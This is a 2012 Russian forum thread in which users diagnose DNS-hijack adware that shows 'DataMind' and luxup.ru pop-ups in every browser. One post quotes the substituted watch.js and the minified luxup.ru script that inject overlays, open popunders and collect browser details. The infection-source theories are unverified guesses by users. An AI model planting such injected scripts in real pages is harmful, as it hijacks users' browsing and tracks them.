Полезная информация

Заказывай стафф с атрибутикой Mozilla и... пусть все вокруг завидуют тебе! Быть уникальным - быть с Mozilla!

№2621-12-2012 18:37:31

Соломон Израилевич
Участник
 
Группа: Members
Зарегистрирован: 21-12-2012
Сообщений: 1
UA: Firefox 17.0

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

Спасибо за то, что вы есть!
Дня четыре назад жена минут 30 посидела за компом, а я таки до сегодняшнего дня искал в инете решение проблемы! Не знаю уж, куда она тыкала мышкой, но результат был очень раздражителен! :)
В общем, сначала симптомы проявились в мозилле, а уж потом и в експлорере. сегодня, благодаря Вам, определил:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: NameServer стоял адрес 5.199.140.180.
В настройках адаптера стоял тот же ip-адрес

Отсутствует

 

№2721-12-2012 22:00:39

tetiana
Участник
 
Группа: Members
Зарегистрирован: 21-12-2012
Сообщений: 4
UA: Opera 11.6

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

voqabuhe пишет

tetiana пишет: Я точно знаю, кто это сделал: radikal.ruБред какой-то нет ничего на радикале, тебе показалось.

Ага. Точно. :D Ты бы погуглил для начала что ли. Например, вот. Не обязательно заходить на сам радикал. В некоторых случаях достаточно зайти на форум, где в посте есть фотка с радикала.

Отредактировано tetiana (21-12-2012 22:02:23)

Отсутствует

 

№2822-12-2012 00:57:18

gjurza
Участник
 
Группа: Members
Зарегистрирован: 22-07-2012
Сообщений: 6
UA: Opera 12.1

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

tetiana пишет
archie пишет

Но вопрос остается - КТО ЭТО СДЕЛАЛ ???

Я точно знаю, кто это сделал: radikal.ru
Может, кто-то еще делает, но у меня без вариантов, загружала фотку и уже тогда у меня возникли подозрения, а после рестарта оперы началось...

У меня еще во всех браузерах стартовая поменялась на http://mailrusearchgo.ru

вот кстати вы правы на все 100% я сейчас вспомнил, что перед тем, как подхватил эту заразу заливал фотку на радикале... и сразу какая то дрянь начала ломиться, благо фаерволл ее чуть чуть остудил...

Отсутствует

 

№2922-12-2012 09:17:20

archie
Участник
 
Группа: Members
Зарегистрирован: 18-12-2012
Сообщений: 11
UA: Firefox 3.6

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

На радикал я не заходил, но в то время заходил пару раз на форум, где были миниатюры с радикала.

Может, кто-нибудь все-таки знает, что это за прога и принцип ее работы?

Отсутствует

 

№3022-12-2012 15:29:33

archie
Участник
 
Группа: Members
Зарегистрирован: 18-12-2012
Сообщений: 11
UA: Iceweasel 3.5

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

Вопрос еще открыт, знающие люди, подскажите, что за программа могла изменить реестр и как она могла попасть на комп? Я же ничего не скачивал и не устанавливал. Мог ли это сделать обычный сценарий javascript?

Отсутствует

 

№3122-12-2012 16:06:52

feas
Участник
 
Группа: Extensions
Откуда: от DNS
Зарегистрирован: 25-08-2011
Сообщений: 5213
UA: Firefox 19.0
Веб-сайт

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

archie пишет

Я же ничего не скачивал и не устанавливал.

Заразная флешка?

archie пишет

Мог ли это сделать обычный сценарий javascript?

Вполне. см Safe Browsing Tool | WOT ( Web of Trust )
Даже установка расширения к какой-то программе способна так сделать.


Добро пожаловать на форум mozilla-russia.org. Здесь вы можете посоветоваться или обратиться за помощью к фанатам и пользователям продуктов Мозиллы. Если не знаете как правильно оформить пост специально для вас расписан пункт 2.2 правил форума
Сброс на примере Firefox – лёгкое решение большинства проблем
Починка браузера. Перенос своих настроек на новый профиль.

Отсутствует

 

№3222-12-2012 16:49:47

tetiana
Участник
 
Группа: Members
Зарегистрирован: 21-12-2012
Сообщений: 4
UA: Opera 11.6

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

archie пишет

Вопрос еще открыт, знающие люди, подскажите, что за программа могла изменить реестр и как она могла попасть на комп? Я же ничего не скачивал и не устанавливал. Мог ли это сделать обычный сценарий javascript?

Зайдите на радикал, загрузите любую фотку и скопируйте, например, верхнюю ссылку, как если бы собирались ее кому-нибудь отправить. В это время у вас будет открываться множество рекламных окон. Если ваша антивирусная программа еще не знакома с этой проблемой, то у вас в директории %Системный диск%:\Documents and Settings\%Имя юзера%\Local Settings\Temp появится экзешник с рандомным именем, который и является той самой "программой". Если у вас в этой директории много других файлов, то отличить нужный сможете по дате создания. Я практически уверена, что это Java/Exploit, поэтому кроме экзешника в темпах у вас появится что-то типа jar_cache%число%.tmp с той же датой/временем создания, что и экзешник.

Если вы хотите более подробных данных, то скачайте себе сниффер и FileMon и проделайте все то же самое, запустив эти программы. Получите подробный лог.

Добавлено 22-12-2012 17:03:03

okkamas_knife пишет

напрямую JS врядли ибо у того что на страничке нет столько прав хотя если нашли способ обходить то возможно (например у JS выполняющегося внутри расширения прав гораздо больше)

JS даже внутри расширения вряд ли может вносить изменения во ВСЕ браузеры. Это должен быть исполняемый файл (exe или bat). Но я знакома с JS на уровне веб-программиста, не более, поэтому не возьмусь утверждать на 100%

Отредактировано tetiana (22-12-2012 17:03:03)

Отсутствует

 

№3322-12-2012 19:34:31

archie
Участник
 
Группа: Members
Зарегистрирован: 18-12-2012
Сообщений: 11
UA: Iceweasel 3.5

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

Если честно, то уже надоело тратить время на всякую ерунду, как не одно, так другое... Пока разберешься с одной проблемой, еще какую-нибудь заразу придумают... Так, что решил полностью отказаться от винды, все-таки это уже прошлый век... В общем всем спасибо за ответы, тему можно закрывать.

Отсутствует

 

№3422-12-2012 23:19:22

WISTRON
Участник
 
Группа: Members
Зарегистрирован: 22-12-2012
Сообщений: 1
UA: unknown 0.0

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

Спасибо! За ваше расследование. Особенно archie, stealthm, gjurza.
Всем вам удачи, здоровья, долголетия! Очень помогли. Всех люблю, целую, обнимаю!


Этот вредный рекламный банер парализовал мою работу в интернете на несколько дней. И надо же - вот где искать никогда не додумаешься - проверить адрес DNS-серверов. Хотя мысли о том, что где-то именно в системе есть бяка, которая подключается к левому серву, только только начали приходить.

Начало стандартное: сначала (у меня прамо в яндексе) появилась зелёная заставка с предложением пройти тест. Удивлению не было предела - от Яндекса! Всплыващее окно: просто кошмар! Реклама системы DataMind - надпись сверху над блоками, скрипт, загружаемый из c.luxip.ru/..., и ссылки, ведущие на id123811.a120.luxup.ru/...

Cureit от DrWeb нашёл троянами инфицированных два екзешника в WINDOWS\TEMP и tmp-файл в Мои Документы и успешно удалил. Но проблема осталась - тизерное окно с рекламными квадратами продолжало регулярно и назойливо выскакивать. Не помогла ни одина из оказавшихся под рукой анти-блок/анти-малваре утилиток. Заражённая машина была заброшена до "когда руки дойдут". И сегодня случайно между делом попалась эта ветка с вашими поисками путей избавления от вредоносного ПО. Потом смотрю: и точно - прописан адрес 5.199.140.180.

И знаете что, я предполагаю, заражение произошло после перехода по укороченной ссылке. Мне несколько дней назад пришла смс-ка с МТС-го номера со словами: "вам фото от Саши. Посмотреть http://укороченная ссылка" (надо пояснить, что Саша, (вероятность, что и у вас какой-нибудь Саша в друзьях большая - согласитесь) вполне мог прислать фото, только номер-то чужой!). И я - этакая беспечность - возьми и вбей ссылку на компе. А там ничего, просто открылась главня гугла. Причём проверка ссылок, уже позже, у DrWeb ничего не нашла, хотя отметила тройную переадресацию, прежде чем добраться до google.ru, причём один из промежуточных адресов, содержащий goog1e- сразу насторожил. Прогон системы антивирусником ничего не дал. А потом началось: сменилась домашняя страница во всех браузерах, "пройдите бесплатное тестирование" и всплывающее окно DataMind на 70% монитора на любом из сайтов - во всех браузерах: в мозилле, в опере, в хроме, в интернет експлорере. Жуть! Впрочем, может и не из-за укороченной ссылки (всё-равно, знайте, и вам могут прислать). Может тоже где-то вроде радикала подхвачено.


Извините за объёмный текст, но так эти страницы чуть лучше будут искаться, и другим помогут.
Ещё раз благодарю всех!!!

Отредактировано WISTRON (22-12-2012 23:33:22)


Должно же когда-нибудь наступить такое время, что торговля трафиком станет безполезной и тизерный хаос уйдёт в небытиё!!!111!!!!!1111АДИН

Отсутствует

 

№3523-12-2012 18:54:00

datamind
Участник
 
Группа: Members
Зарегистрирован: 23-12-2012
Сообщений: 1
UA: Chrome 22.0

Re: Вредоносное рекламное ПО с сайта LUXUP.RU

Здравствуйте,
Хотим сообщить, что наша рекламная платформа Datamind не имеет отношения к вирусам, распространяемым злоумышленниками. Наши специалисты пытаются найти способы пресечения их деятельности.


archie пишет

Здравствуйте, пару дней назад появилась проблема.
При открытии разных сайтов, где раньше никогда не было рекламы, выскакивает рекламное окно. Вчера целый день выскакивала реклама marketgid, сегодня поменялось на "БЕСПЛАТНОЕ ТЕСТИРОВАНИЕ ОТ (название открываемого сайта)". На этом сайте выскочило то же самое окно.
Рекламное окно на javascript.
В других браузерах тоже самое.
Ось - вин хр.
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
Заранее спасибо за помощь.


Всем привет, немного разобрался в ситуации.

1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.

3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу  mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.

На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.

У кого какие мысли по этому поводу?


  Watch.js

скрытый текст
function f_filterResults(n_win, n_docel, n_body) {
    var n_result = n_win ? n_win : 0;
    if (n_docel && (!n_result || (n_result > n_docel)))
        n_result = n_docel;
    return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result;
}

function f_clientWidth() {
    return f_filterResults (
        window.innerWidth ? window.innerWidth : 0,
        document.documentElement ? document.documentElement.clientWidth : 0,
        document.body ? document.body.clientWidth : 0
    );
}
function f_clientHeight() {
    return f_filterResults (
        window.innerHeight ? window.innerHeight : 0,
        document.documentElement ? document.documentElement.clientHeight : 0,
        document.body ? document.body.clientHeight : 0
    );
}
function f_scrollLeft() {
    return f_filterResults (
        window.pageXOffset ? window.pageXOffset : 0,
        document.documentElement ? document.documentElement.scrollLeft : 0,
        document.body ? document.body.scrollLeft : 0
    );
}
function f_scrollTop() {
    return f_filterResults (
        window.pageYOffset ? window.pageYOffset : 0,
        document.documentElement ? document.documentElement.scrollTop : 0,
        document.body ? document.body.scrollTop : 0
    );
}

function popMove()
{
    popDiv = document.getElementById("popDiv");
    if(popDiv != null)
    {
        popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
        popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
    }
}

function popHide()
{
    popDiv = document.getElementById("popDiv");
    clearInterval(popMoveRun);
    popDiv.style.display = 'none';
    return false;
}

function popShowClose()
{
    popControl = document.getElementById("popControl");
    popControl.style.display = 'block';
}

if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
    var popMutex = true;
   
    var popDiv = document.createElement("div");
    popDiv.id = "popDiv";
    popDiv.style.position = "absolute";
    popDiv.style.width = "850px";
    popDiv.style.height = "550px";
    popDiv.style.backgroundColor = "white";
    popDiv.style.zIndex = "1000";
    popDiv.onclick = popShowClose;
    document.body.appendChild(popDiv);
   
    var advName = "DataMind";
    var popInfo = document.createElement("div");
    popInfo.id = "popInfo";
    popInfo.style.position = "absolute";
    popInfo.style.left = "10px";
    popInfo.style.fontSize = "11px";
    popInfo.style.fontWeight = "bold";
    popInfo.style.padding = "0 1px 25px";
    popInfo.style.height = "13px";
    popInfo.style.color = "black";
    popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
    popInfo.style.display = "block";
    popInfo.innerHTML = "Реклама системы " + advName + " <font color=\"red\">Посетите сайт спонсора чтобы продолжить просмотр сайта</font>";
    popDiv.appendChild(popInfo);
   
    var popControl = document.createElement("div");
    popControl.id = "popControl";
    popControl.style.position = "absolute";
    popControl.style.right = "10px";
    popControl.style.display = 'none';
    popDiv.appendChild(popControl);
   
    var popControlClose = document.createElement("a");
    popControlClose.href = "#";
    popControlClose.onclick = popHide;
    popControlClose.style.fontSize = "11px";
    popControlClose.style.fontWeight = "bold";
    popControlClose.style.padding = "0 1px 25px";
    popControlClose.style.color = "#096";
    popControlClose.style.height = "13px";
    popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
    popControlClose.style.display = "block";
    popControlClose.innerHTML = "Закрыть";
    popControl.appendChild(popControlClose);
   
    var adDiv = document.createElement("div");
    adDiv.id = "lx_381874";
    adDiv.style.position = "absolute";
    adDiv.style.top = "15px";
    popDiv.appendChild(adDiv);
   
   
    var adScript = document.createElement("script");
    adScript.type = "text/javascript";
    adScript.language="JavaScript";
    adScript.charset = "utf-8";
    adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
    document.body.appendChild(adScript);
   
    var popMoveRun = setInterval (popMove, 10);
    setTimeout(popShowClose, 10000);
}


lb123811.js
скрытый текст
(function(){var j=!0,l=null,z=!1;function A(){return function(){}}function e(a){return parseInt(a,10)}function oa(){return 100*((new Date).getTime()%1E7)+Math.round(99*Math.random())}function g(a){return"undefined"!=typeof a}function H(a,b){b||(b=A());var c=n.createElement("script");c.setAttribute(pa,qa);c.setAttribute("src",a);if(g(c))w?c.onreadystatechange=function(){("loaded"==this.readyState||"complete"==this.readyState)&&setTimeout(b,0)}:c.onload=function(){setTimeout(b,0)},N.appendChild(c)}function O(a){var b=n.createElement("style");b.setAttribute("rel",
"stylesheet");b.setAttribute(pa,"text/css");N.appendChild(b);w?b.styleSheet.cssText=a:b.appendChild(n.createTextNode(a))}function ra(){var a=z,b=navigator,c=l;if(g(b.plugins)&&"object"==typeof b.plugins["Shockwave Flash"]){if((c=b.plugins["Shockwave Flash"].description)&&(!g(b.mimeTypes)||!b.mimeTypes["application/x-shockwave-flash"]||b.mimeTypes["application/x-shockwave-flash"].enabledPlugin))c=c.replace(/^.*\s+(\S+\s+\S+$)/,"$1"),a=[0,0,0],a[0]=e(c.replace(/^(.*)\..*$/,"$1")),a[1]=e(c.replace(/^.*\.(.*)\s.*$/,
"$1")),a[2]=/[a-zA-Z]/.test(c)?e(c.replace(/^.*[a-zA-Z]+(.*)$/,"$1")):0}else if(g(f.ActiveXObject))try{var d=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if(d&&(c=d.GetVariable("$version")))c=c.split(" ")[1].split(","),a=[e(c[0]),e(c[1]),e(c[2])]}catch(m){}return a=a!==z?a.join("."):a}function Qa(){var a=ra(),b="10.0.42".split(".");if(a===z)return z;a=a.split(".");b[0]=parseInt(b[0],10);b[1]=parseInt(b[1],10)||0;b[2]=parseInt(b[2],10)||0;return a[0]>b[0]||a[0]==b[0]&&a[1]>b[1]||a[0]==b[0]&&
a[1]==b[1]&&a[2]>=b[2]?a.join("."):z}function D(a,b,c){a.addEventListener?a.addEventListener(b,c,z):a.attachEvent("on"+b,c)}function Ra(a,b){a.innerHTML=b;for(var c=[],d=a.childNodes,m=0;d[m];m++)c&&d[m].nodeName&&"script"===d[m].nodeName.toLocaleLowerCase()&&(!d[m].type||"text/javascript"===d[m].type.toLowerCase())&&c.push(d[m].parentNode?d[m].parentNode.removeChild(d[m]):d[m]);for(var e in c){var d=c[e],m=d.text||d.textContent||d.innerHTML||"",f=n.createElement("script");f.type="text/javascript";
f.appendChild(n.createTextNode(m));N.insertBefore(f,N.firstChild);N.removeChild(f);d.parentNode&&d.parentNode.removeChild(d)}}function aa(){var a="",a="?rt="+oa();n.referrer&&(a+="&r="+escape(n.referrer));P&&(a+="&recurring=1");ba&&(a+="&flash="+escape(ba));w&&(a+="&isie=1");if(!f[h].popunderShow)for(var b in i)if(i.hasOwnProperty(b)&&"object"==typeof i[b]&&g(i[b].type)&&"popunder"==i[b].type){a+="&pu=1";break}a+="&f="+h;g(screen.width)&&(a+="&scr="+escape(screen.width+"x"+screen.height));return a+=
f[h].multishowsAdd?"&"+f[h].multishowsAdd:""}function Sa(a){for(var b=a.length,c=[],d=0;d<b;d++)c.push(a[d].l+";"+a[d].n.join(";"));ca&&H(ca+"?"+c.join("&"),A())}function Ta(){I&&(clearTimeout(I),I=l);for(var a=E.length,b=[],c=0;c<a;c++)if(E[c]){var d;a:{var m=E[c];if(m){var e=getElementsByClass("lx__tsb",m);d=[];for(var g=[],k=void 0,i=e.length,k=0;k<i;k++){var h;if(h=e[k])b:{h=e[k];if(!(0===h.offsetWidth||0===h.offsetHeight))for(var q=C&&!f.opera?s.clientHeight:u.clientHeight,o=C&&!f.opera?s.clientWidth:
u.clientWidth,r=h.getClientRects(),v=0,w=r.length;v<w;v++){var p=r[v],t=0<=p.left&&p.left+(p.width?p.width:p.right-p.left)<o,x;if(x=0<=p.top&&p.top+(p.height?p.height:p.bottom-p.top)<q){if(t){p=n.elementFromPoint((p.left+p.right)/2,(p.top+p.bottom)/2);if(p===h)p=j;else c:{if(p)for(p=p.parentNode;p!=l;){if(p==h){p=j;break c}p=p.parentNode}p=z}t=p}x=t}if(x){h=j;break b}}h=z}h&&(d.push(e[k].getAttribute("tsbid")),g.push(e[k]))}e=g.length;for(k=0;k<e;k++)h=g[k],h.className=h.className.replace(RegExp("(^|\\s)lx__tsb(\\s|$)",
"g"),"$1").replace(/\s+/g," ").replace(/(^ | $)/g,"");if(g=d.length){m=getElementsByClass("lx__tsbc",m);m=m[0];m=m.getAttribute("tsbc");d={n:d,all:i==g,l:m};break a}}d=z}if(d!==z){d.all&&delete E[c];i=d.n;m=[];g=0;k=i.length;a:for(;g<k;g++){e=0;for(h=m.length;e<h;e++)if(m[e]==i[g])continue a;m[m.length]=i[g]}b.push({n:m,l:d.l})}}b.length&&Sa(b)}function da(){I&&clearTimeout(I);I=setTimeout(Ta,1E3)}function sa(){t.demogr&&t.interests&&!t.sent&&H("http://"+S+"/set_li_stat/?sex="+t.sex+"&lage="+t.lage+
"&uage="+t.uage+"&interest="+t.interest,function(){t.sent=j})}function x(a,b){o.style[a]=b}function Ua(){f[b].bottomReady=function(a){a=e(a);o.childNodes[1].height=a+q;x("height",a+5+q)}}function ea(a){var b=a.toString(),b=b.substr(9),b=b.substr(0,b.indexOf("("));g(J[b])?(clearTimeout(J[b]),J[b]=setTimeout(function(){clearInterval(J[b]);a();delete J.C},ta)):(J[b]=setInterval(function(){a()},ta),a())}function ua(){ea(va)}function wa(){ea(T);w&&(ea(xa),setTimeout(T,250))}function xa(){x("width",s.clientWidth?
s.clientWidth:u.clientWidth)}function va(){fa(K,{bottom:j,right:j})}function T(){fa(o,{bottom:j})}function fa(a,b){var c=a.style;if(g(b[v])&&b[v]&&!g(a.d))a.d=e(a.currentStyle[v]),g(b[v])&&b[v]&&(c[v]=U);if(g(b.right)&&b.right&&!g(a.q)&&(a.q=e(a.currentStyle.right),g(b.right)&&b.right))c.right="";if(g(b.left)&&b.left&&!g(a.u))a.u=e(a.currentStyle.left);if(g(b[v])&&b[v])c.position=L,c.top=w?0-a.d-(e(c.height)?e(c.height):a.offsetHeight)+(s.clientHeight?s.clientHeight:u.clientHeight)+e(C&&!f.opera?
s.scrollTop:u.scrollTop)+q:0-a.d-e(c.height)+e(f.innerHeight)+e(f.pageYOffset)+q;if(g(b.right)&&b.right)c.position=L,C?c.right=a.q-(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q:c.left=0-a.q-(e(c.width)?e(c.width):a.offsetWidth)+(s.clientWidth?s.clientWidth:u.clientWidth)+(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q;if(g(b.left)&&b.left)c.position=L,c.left=a.u+e(C&&!f.opera?s.scrollLeft:u.scrollLeft)+q}function ya(){var a=n.getElementsByTagName("object"),b=n.getElementsByTagName("embed"),c={m:z,w:[],embeds:[]};
if(V)for(var d=0;d<a.length;d++){for(var e=z,f=a[d].getElementsByTagName("param"),h=0;h<f.length;h++)if("wmode"==f[h].getAttribute("name").toLowerCase()){e=j;break}if(e)c.m=j,c.w.push(a[d])}for(d=0;d<b.length;d++){a=b[d].getAttribute("wmode");if(!(e=!a))g(a)?(a=a.toLowerCase(),a="transparent"!=a&&"opaque"!=a?z:j):a=z,e=!a;if(e)c.m=j,c.embeds.push(b[d])}return c}function Va(){for(var a=ya(),b=a.w,a=a.embeds,c=0;c<b.length;c++){var d=n.createElement("param");d.setAttribute("name","wmode");d.setAttribute("value",
"transparent");b[c].appendChild(d);b[c].outerHTML=b[c].outerHTML}for(c=0;c<a.length;c++)a[c].setAttribute("wmode","transparent"),a[c].outerHTML=a[c].outerHTML}function Q(a){var b=a.which?a.which:a.button,a=(w?a.srcElement:a.target).nodeName.toLowerCase();if(("a"==a||"img"==a)&&2!=b&&3!=b)clearTimeout(ga),ga=setTimeout(function(){ga=l;za()},500)}function Wa(){var a="";if(F)for(var b in i)i.hasOwnProperty(b)&&"object"==typeof i[b]&&(a+=escape(b.substr(1))+";");0<a.length&&(a=a.substring(0,a.length-
1));return a}function Aa(a){Ba(a.target?a.target:a.srcElement)}function Xa(a){var b=/\/i\/(a??)(\d+?)\//m,c=b.exec(a),d=z;if(c!=l&&16!=c){d=e(c[2]);d=(2*(10*d+40)-40)/10;16<=d&&(d=16);var f=10*d+40,d=a.replace(b,"/i/$1"+d+"/")}return{url:d,size:f}}function Ca(a){var b=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollTop:u.scrollTop),c=e(b+(C&&!f.opera?s.clientHeight:u.clientHeight)),d=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollLeft:u.scrollLeft),g=e(d+(C&&!f.opera?s.clientWidth:u.clientWidth)),
h=a.getClientRects()[0],i=Math.round(h.top)+b,k=Math.round(h.bottom)+b,o=Math.round(h.left)+d,h=Math.round(h.right)+d;if(i<b)a.style.top=e(a.style.top)+(b-i)+W+q;if(k>c)a.style.top=e(a.style.top)-(k-c)-W+q;if(o<d)a.style.left=e(a.style.left)+(d-o)+W+q;if(h>g)a.style.left=e(a.style.left)-(h-g)-W+q}function ha(a,b){clearTimeout(a.getAttribute("enlargeTimer"));var c=Da(b),d=e(a.height)-y;a.width=e(a.width)-y;a.height=d;d=e(c.left)>e(a.style.left)?e(a.style.left)+y/2:e(a.style.left)-y/2;a.style.top=(e(c.top)>
e(a.style.top)?e(a.style.top)+y/2:e(a.style.top)-y/2)+q;a.style.left=d+q;e(a.width)>e(b.width)?a.setAttribute("shrinkTimer",setTimeout(function(){ha(a,b)},R)):(a.style.top="-100000px",a.style.left="-100000px",b.style.visibility="",b.parentNode.style.zIndex="")}function Ea(a,b){clearTimeout(a.getAttribute("shrinkTimer"));var c=e(a.height)+y;a.width=e(a.width)+y;a.height=c;c=e(a.style.left)-y/2;a.style.top=e(a.style.top)-y/2+q;a.style.left=c+q;Ca(a);e(a.width)<b&&a.setAttribute("enlargeTimer",setTimeout(function(){Ea(a,
b)},R))}function Da(a){for(var b=0,c=0;a&&"relative"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position&&"absolute"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position;)b+=e(a.offsetTop),c+=e(a.offsetLeft),a=a.offsetParent;return{top:b,left:c}}function Ba(a){var b,c=Da(a),d=Xa(a.src),e=d.size;if((d=d.url)||d!=a.src){a.previousSibling&&"img"==a.previousSibling.nodeName.toLowerCase()?b=a.previousSibling:(b=a.cloneNode(z),w&&b.detachEvent("onmouseover",Aa),b.style.position=L,b.style.top=
"-100000px",b.style.left="-100000px",b.style.margin="0px",n.addEventListener?b.addEventListener("mouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))},z):b.attachEvent("onmouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))}),a.parentNode.insertBefore(b,a));if(b.src==a.src){var f=b.cloneNode(z);D(f,"load",function(){b.src=f.src;setTimeout(function(){f.parentNode.removeChild(f)},
100)});f.src=d;b.parentNode.insertBefore(f,b)}b.width=a.width;b.height=a.height;b.style.top=c.top+q;b.style.left=c.left+q;a.style.visibility="hidden";a.parentNode.style.zIndex=1E5;Ca(b);b.setAttribute("enlargeTimer",setTimeout(function(){Ea(b,e)},R))}}function Ya(a,b){b&&(D(n,ia,Fa(a)),X&&(Y(a)(),D(f,"resize",Ga(a)),D(f,ia,Ga(a))));for(var c=getElementsByClass("close",a.a),d=c.length,e=0;e<d;e++)D(c[e],ja,Za(a));c=getElementsByClass("ref",a.a);d=c.length;for(e=0;e<d;e++)D(c[e],ja,Ha(a))}function Za(a){return function(b){if(b||
f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;a.s=j;ka(a);b=new Date;b.setTime(b.getTime()+36E5*$a);n.cookie="_lxretpopupignore=1; path=/; expires="+b.toUTCString()}}function Ha(a){return function(b){if(b||f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;clearTimeout(a.i);a.j=j;ka(a,function(){H(la+a.B+"/"+aa(),A())})}}function Fa(a){return function(){if(!a.s&&!a.j){var b=e(s.scrollTop?s.scrollTop:u.scrollTop);!a.k&&b>=a.v?ab(a):a.k&&b<a.v&&
ka(a)}}}function Y(a){return function(){a.a[a.b+"Offset"]=e(a.a.style[a.b]);var b={bottom:j};a.b==Ia&&(b[Ia]=j);a.b==Ja&&(b[Ja]=j);fa(a.a,b)}}function Ga(a){return function(){g(a.t)&&clearTimeout(a.t);a.t=setTimeout(Y(a),100)}}function Ka(a){var b=0;return b=X?a.a[a.b+"Offset"]:e(a.a.style[a.b])}function ab(a){a.k=j;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.i=setTimeout(Ha(a),1E3*a.refresh);a.a.style.display="block";a.c=setInterval(function(){var b=Ka(a),c=b+La;0>b&&0>c?(a.h=j,a.a.style[a.b]=
c+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=0+q);X&&Y(a)()},Ma)}function ka(a,b){a.k=z;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.c=setInterval(function(){var c=Ka(a),d=c-La;c>=-a.width&&d>-a.width?(a.h=j,a.a.style[a.b]=d+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=-a.width+q,a.a.style.display="none",g(b)&&b());X&&Y(a)()},Ma)}function za(a){if(!Z){Z=j;var b=Wa();b&&(a?(n.write('<scr'+'ipt type="'+qa+'" language="JavaScr'+'ipt" src="'+la+b+"/"+aa()+'"><\/scr'+'ipt>'),Z=z):H(la+b+"/"+aa(),function(){Z=
z}))}}var i={"_336612":{id:"lx_336612"},"_381874":{id:"lx_381874",A:!0}},h="__lxG123811__",B="__lxG__",G={},n=document,f=window,u=n.body,s=n.documentElement,N=function(){var a=n.getElementsByTagName("head")[0];if(a)return a;for(a=s.firstChild;a&&"#text"==a.nodeName.toLowerCase();)a=a.nextSibling;if(a&&"#text"!=a.nodeName.toLowerCase())return a;a=n.createElement("head");
s.appendChild(a);return a}(),$=navigator.userAgent.toLowerCase(),w=/msie/.test($)&&!/opera/.test($),bb=(navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],C="CSS1Compat"===n.compatMode,ma=/chrome/.test($),V=/opera/.test($),P=z,Z=z,ga=l,F=0,E=[],I=l,ba=ma?Qa():ra(),Na=z,K=l,o=l,ta=50,na=l,Oa=z,v="bottom",q="px",L="absolute",r={},qa="text/javascript",pa="type",U="auto",M="",Pa=z,ca="",W=3,y=10,R=10,Ja="right",Ia="left",ia="scroll",ja="click",$a=480,Ma=15,La=22,X=w&&(!C||
8>e(bb)&&C),S="luxup.ru",la="http://"+S+"/multishows/",J={},t={demogr:z,interests:z,sent:z};getElementsByClass=n.getElementsByClassName?function(a,b){return(b||document).getElementsByClassName(a)}:function(a,b){var c=(b||document).getElementsByTagName("*"),d=c.length,e=a.split(/\s+/),f=e.length,h=[],g,i;for(g=0;g<d;g++)for(i=0;i<f;i++)if(-1!=c[g].className.search("\\b"+e[i]+"\\b")){h.push(c[g]);break}return h};D(f,ia,da);G[h]={};G[h].g=function(){if(!M)return j;M+="?rnd="+oa()+(f[h].popunderAdd?"&"+
f[h].popunderAdd:"");var a=window;window.open(M,h+"popunder","toolbar=1,location=1,status=1, menubar=1,scrollbars=1,resizable=1");M="";a.focus();u.detachEvent?(u.detachEvent("onclick",G[h].g),u.releaseCapture()):(u.removeEventListener("click",G[h].g,j),u.removeEventListener("click",G[h].g));return j};g(f[h])||(f[h]={});g(f[b])||(f[b]={});f[h].closed=A();f[h].clicked=A();if(!g(f[h].popunderShow))f[h].popunderShow=z;if(!g(f[h].allLoaded))f[h].allLoaded=A();if(!g(f[h].popunderAdd))f[h].popunderAdd="";
